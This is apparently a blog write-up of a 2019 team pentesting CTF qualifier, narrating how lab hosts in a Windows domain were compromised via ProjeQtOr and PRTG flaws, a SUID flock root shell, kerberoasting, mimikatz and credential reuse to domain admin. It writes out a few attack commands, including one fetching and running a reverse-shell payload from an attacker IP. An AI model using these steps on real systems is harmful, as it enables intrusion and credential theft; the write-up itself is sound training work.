/ Blog

EY Hackathon (CTF Qualifiers) Writeup (2019)

The qualifers was a team based pentesting CTF, and it requires the knowledge of Windows and Linux systems, enumeration, privilege escalation, and lateral movement.

Targets:
10.10.110.3 (Domain Controller for catalyst.local)
10.10.110.100 (Linux Server running vulnerable service)
10.10.110.101 (Windows server)
10.10.110.102 (Windows server)
10.10.110.200 (Windows client)

Also, through the use of Bloodhound, we were able to determine which service accounts were part of Domain Admin grooup. Additionally, PowerSploit helped us to enumerate the accounts with Local Admin rights.

1) 10.10.110.100 (Vulnerable web application leading to RCE. Subsequently privilege escalation through misconfigured SUID binary)

An application called ProjeQtOr was installed on the server. Once logged in as admin, a quick google search of the version number presents us a known exploit. (https://www.exploit-db.com/exploits/45680). The exploit allows the unrestricted upload of a .shtml file which leads to a command execution. Once a shell was gained, privilege escalation was gained through the enumeration of root SUID binaries. The binary flock was listed as one of the binaries with root SUID permissions. My fellow teammate suggests that flock -u / /bin/sh -p would spawn a shell. Once used, a root shell was opened.

2) 10.10.110.102 (Vulnerable web application with SYSTEM privilege code execution)

An application, PRTG Network Manager was installed on the server. The server allows the default user to run system privilege commands when a trigger happens (Like the failure to PING a server, and therefore 'triggering' an event). This allows act of adding users, and subsequently loading additional post exploitation tools to obtain more information. A shell was gain through the use of wget -O shell.exe [ip address]/[payload] | cmd.exe. Once and event is triggered, a shell will be given. (shell.exe created using msfvenom, listener initiated through msfconsole. Link to vulnerability: https://www.codewatch.org/blog/?p=453)

3) 10.10.110.200 (Lateral movement through the use mimikatz, discovering service account with weak implementations)

In 10.10.110.102, mimikatz was used to discover service accounts. According to this web page: https://www.cyberark.com/blog/service-accounts-weakest-link-chain/. Following the guide, it was found that an account was using RC4-HMAC as the encryption scheme. Additionally, mimikatz allows the dumping of .kirbi files. Running Get-TGSCipher (https://github.com/cyberark/RiskySPN/blob/master/Get-TGSCipher.ps1) would allow us to dump the hash, the Get-TGSCipher module allows the dumping of hash into hashcat format. (I do not need to explain the hashcat process). Then magic, we got credentials for 10.10.110.200. Enumeration from Powersploit on 10.10.110.102 also suggests that the vulnerable service account is Local Admin on 10.10.110.200.

4) 10.10.110.101 (Lateral movement through the use of metasploit lsadump on 10.10.110.200)

Since we had a service account from 10.10.110.200, we were able to use metasploits's SMB PSExec module to start a shell. Once meterpreter was injected, we loaded LSA Dump post exploitation module, and it dumped additional credentials which can be used on 10.10.110.101. Using crackmapexec, we were able to confirm that the account had Local Admin rights on the server.

5) 10.10.110.3 (Domain admin access from Lateral movement into 10.10.110.101, and subsequently a script containing an account with Domain Admin credentials)

Since we had access on 10.10.110.101, exploring the file system presented us a directory called scripts. Investigating the contents within reveals a powershell script for an SQL job. Looking back at the data from bloodhound, a service account meant for SQL was part of the Domain Admin group. Since the credentials was hard-coded, we could check if it had acess to 10.10.110.3 using crackmapexec, and the results indicated that it had access. Therefore, domain admin achieved.

🐢🐢🐢🐢🐢
Shells!

Takeaways from this qualifiers:

  • Enumeration is not just putting scripts into machines, and proceed to google search on XYZ exploit. Rather it is to understand that which binary does what and see if some weakness or misconfiguration can be leveraged on as well.

  • Manage to learn and practice mimikatz, kerberoasting, PowerSploit, crackmapexec, and also some practice on Lateral movement in a Windows environment. Pretty sure this would help us in our careers next time. (One does not get a to chance to attack a Windows AD envrionment everyday)

  • Of course never give up. We were stuck for 5 days. Readings after readings after readings made me understood Windows systems better, and also how certain weak implementations may cause actual enterprise systems to be taken over.

🔥 Long live Kerberos 🔥

EY Hackathon (CTF Qualifiers) Writeup (2019)
Share this